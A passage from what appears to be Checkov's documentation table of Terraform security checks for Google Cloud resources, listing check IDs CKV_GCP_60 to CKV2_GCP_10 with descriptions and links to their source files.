| resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | -| 2232 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | -| 2233 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | -| 2234 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | -| 2235 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | -| 2236 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | -| 2237 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | -| 2238 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | -| 2239 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | -| 2240 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | -| 2241 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | -| 2242 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | -| 2243 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | -| 2244 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | -| 2245 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | -| 2246 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | -| 2247 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | -| 2248 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | -| 2249 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | -| 2250 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | -| 2251 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | -| 2252 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | -| 2253 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | -| 2254 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | -| 2255 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | -| 2256 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | -| 2257 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | -| 2258 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | -| 2259 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | -| 2260 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | -| 2261 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | -| 2262 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | -| 2263 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | -| 2264 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | -| 2265 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | -| 2266 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | -| 2267 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | -| 2268 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | -| 2269 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | -| 2270 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | -| 2271 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | -| 2272 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 2273 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 2274 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 2275 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 2276 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 2277 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 2278 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 2279 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 2280 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 2281 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 2282 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | -| 2283 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | -| 2284 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | -| 2285 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | -| 2286 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2287 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2288 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2289 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2290 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | -| 2291 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | -| 2292 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | -| 2293 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | -| 2294 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2295 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2296 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2297 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | -| 2298 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | -| 2299 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 2300 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 2301 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 2302 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 2303 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 2304 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 2305 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | -| 2306 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | -| 2307 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | -| 2308 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | -| 2309 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | -| 2310 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | -| 2311 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 2312 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 2313 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | -| 2314 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | -| 2315 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | -| 2316 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2317 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2318 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2319 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2320 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 2321 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 2322 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2323 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2324 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2325 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 2326 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 2327 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2328 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2329 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2330 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2331 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2332 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2333 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | 